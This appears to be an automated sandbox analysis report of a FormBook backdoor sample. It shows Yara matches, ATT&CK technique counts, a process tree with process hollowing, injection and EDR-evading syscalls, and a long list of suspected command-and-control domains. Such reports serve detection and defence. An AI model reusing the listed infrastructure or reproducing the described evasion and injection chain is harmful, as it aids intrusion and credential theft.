              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: oxhvi.msc, Binary or memory string: WIN_81
Source: oxhvi.msc, Binary or memory string: WIN_XP
Source: oxhvi.msc.exe, 0000001B.00000000.1843929624.0000000000353000.00000002.00000001.01000000.0000000D.sdmp, Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: oxhvi.msc, Binary or memory string: WIN_XPe
Source: oxhvi.msc, Binary or memory string: WIN_VISTA
Source: oxhvi.msc, Binary or memory string: WIN_7
Source: oxhvi.msc, Binary or memory string: WIN_8

              Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, Code function: 8_2_005B2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_005B2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc, Code function: 8_2_005B1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_005B1B61
MITRE ATT&CK tactics and techniques (the number in parentheses is the count of matched signatures for that technique; techniques without a number had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations

Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server

Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain

Execution: Native API (1); Shared Modules (1); Command and Scripting Interpreter (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell

Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (2); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers

Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (712); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers

Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1); Rootkit (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (712); Rundll32 (1)

Credential Access: Credential API Hooking (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture

Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (227); Security Software Discovery (361); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1); System Network Connections Discovery; Process Discovery; Permission Groups Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media

Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection

Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB

Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service
Behavior Graph ID: 1549399, Sample: M1Y6kc9FpE.exe, Startdate: 05/11/2024, Architecture: WINDOWS, Score: 100

Network: www.reon-network.xyz, www.lladinco.online, 4 other IPs or domains
Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 13 other signatures
Signature on www.reon-network.xyz: Performs DNS queries to domains with low reputation

Process tree (child processes indented under their parent; dropped files and signatures listed per process):

M1Y6kc9FpE.exe
  dropped: C:\Users\user\AppData\Local\...\oxhvi.msc (PE32); C:\Users\user\AppData\Local\Temp\...\wnrs.vbe (Unicode); C:\Users\user\AppData\...\bvqmcwxut.docx (Unicode)
  signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  wscript.exe
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    cmd.exe
      oxhvi.msc
        dropped: C:\Users\user\AppData\Local\...\oxhvi.msc.exe (PE32); C:\Users\user\AppData\Local\...\oxhvi.msc (PE32); C:\Users\user\AppData\Local\...\oxhvi.msc.exe (PE32); 2 other files (1 malicious)
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
        RegSvcs.exe
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
          explorer.exe (injected)
            signatures: Uses netsh to modify the Windows network and firewall settings
            oxhvi.msc.exe
              dropped: C:\Users\user\AppData\...\oxhvi.msc.exe.exe (PE32)
              signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes
              RegSvcs.exe
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
              RegSvcs.exe
                signatures: Found direct / indirect Syscall (likely to bypass EDR)
            oxhvi.msc.exe
              signatures: Injects a PE file into a foreign processes
              RegSvcs.exe
              RegSvcs.exe
            oxhvi.msc.exe
              RegSvcs.exe
              RegSvcs.exe
            8 other processes
              signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              cmd.exe
                conhost.exe
        RegSvcs.exe
          signatures: Tries to detect virtualization through RDTSC time measurements; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
      conhost.exe
    cmd.exe
      signatures: Uses ipconfig to lookup or modify the Windows network settings
      ipconfig.exe
        signatures: Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
      conhost.exe
    cmd.exe
      conhost.exe
      ipconfig.exe

Source | Detection | Scanner | Label | Link
M1Y6kc9FpE.exe | 79% | ReversingLabs | Win32.Backdoor.FormBook |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe.exe | 0% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.arehouse-inventory-62571.bond | unknown | unknown | true | | unknown
www.inlinlong.top | unknown | unknown | true | | unknown
18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
www.reon-network.xyz | unknown | unknown | true | | unknown
www.lladinco.online | unknown | unknown | true | | unknown
212.20.149.52.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.ybokiesite.online/o52o/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.arehouse-inventory-62571.bond/o52o/ | explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.1r1f9bnfo4s4.top/o52o/www.heiritforum.buzz | explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comer | explorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.infeng01.xyzReferer: | explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000011.00000000.1641297778.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
                                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.anion.appexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.inlinlong.topexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://excel.office.comexplorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://www.reon-network.xyz/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.autoitscript.com/autoit3/M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.indseniorjob881.click/o52o/www.anion.appexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jg-bw.app/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.01595.xyz/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.inecraftpuro.netexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.anion.appReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jg-bw.appReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.lladinco.online/o52o/www.inlinlong.topexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.arehouse-inventory-62571.bondexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.eusvexk.shopexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wns.windows.com/explorer.exe, 00000011.00000002.2628883555.0000000000A20000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.microsoft.cexplorer.exe, 00000011.00000000.1639216371.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.heiritforum.buzzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://android.notify.windows.com/iOSdexplorer.exe, 00000011.00000000.1641297778.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.1r1f9bnfo4s4.top/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.autoitscript.com/autoit3/JM1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2631786659.0000000003010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2287125135.000000000301B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285710528.0000000003021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285710528.000000000301F000.00000004.00000001.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1810261726.0000000000365000.00000002.00000001.01000000.0000000D.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1941591170.0000000000365000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                      high
                                                      http://www.ybokiesite.onlineReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jg-bw.app/o52o/www.eusvexk.shopexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.heheartofthehome.netexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.heheartofthehome.net/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.indseniorjob881.clickexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.eusvexk.shop/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://outlook.comexplorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.ybokiesite.online/o52o/www.heheartofthehome.netexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.inlinlong.topReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.mewtcp.xyz/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.arehouse-inventory-62571.bondReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
